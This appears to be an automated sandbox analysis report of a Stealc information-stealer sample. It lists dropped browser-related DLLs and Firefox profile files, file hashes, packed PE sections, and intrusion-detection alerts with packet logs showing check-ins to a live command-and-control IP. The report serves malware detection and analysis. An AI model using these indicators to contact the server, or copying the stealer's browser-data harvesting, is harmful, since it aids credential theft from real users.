SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKFCBAEHCAEGDHJKFHJKFIJKJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 86aY1jzemK.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 86aY1jzemK.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.946919703946215
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'853'440 bytes
MD5:	ef4d942f44362d48b109c8a182ba537d
SHA1:	b2732ce2977293e2f08e4ddfc0012a6673208692
SHA256:	fb2fdeded1386ef31205d4e56c05942f49b0292688d14bdc0616c22cae4567b3
SHA512:	fcc83be6d71b5bd81c66896c225e4544ecc6c65db46e5384bce4e926583a41b5dcfbd19f289ae973999f939bcaae156aa56d4b1e34d6795927266a68567d5e59
SSDEEP:	24576:lzjuGRTblK2S28Qw+XYLcg7Iv2w0gTT+alkoOndJT9yO+XnpvmOb/GLuSlh4Z3pM:lHuSI2SlQ1ewcGBUU/6uSlmmL
TLSH:	DA8533F2F9D7A11EDD6E05B9495B20BEEDE0DC6C0CE2FA9309E0927945C3E6490CB185
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa9d000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FB8FD39F46Ah

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	62d32fff25449f6b236464dfa13fa0fe	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x29f000	0x200	cb453adc72a6f8b7f58464e57d164e9a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
exbnbhbd	0x4fd000	0x19f000	0x19e400	c43087733cedde68788a6b1c4c70de94	False	0.9948048289453832	data	7.953344026869935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
krctzlzf	0x69c000	0x1000	0x600	9a8b53251b28bada4128bcf9a78252e2	False	0.5859375	data	5.084669406209218	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x69d000	0x3000	0x2200	517c1ab5c46922d54d2077ceb5ece9d4	False	0.07261029411764706	DOS executable (COM)	0.8109996744920231	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T02:40:08.686078+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:08.922535+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:08.928677+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.8	49705	TCP
2024-09-26T02:40:09.151980+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:09.159841+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.8	49705	TCP
2024-09-26T02:40:11.255448+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:11.737711+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:16.693561+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:17.576689+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:18.203505+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:19.565133+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:21.932123+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49705	185.215.113.37	80	TCP
2024-09-26T02:40:22.451460+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49705	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 02:40:07.709300995 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:07.714248896 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:07.714323044 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:07.714461088 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:07.719307899 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:08.438813925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:08.438937902 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:08.441525936 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:08.447964907 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:08.685982943 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:08.686078072 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:08.687124014 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:08.691893101 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:08.922405005 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:08.922430038 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:08.922534943 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:08.923772097 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:08.928677082 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.151918888 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:09.151937008 CEST	80	49705	185.215.113.37	192.168.2.8
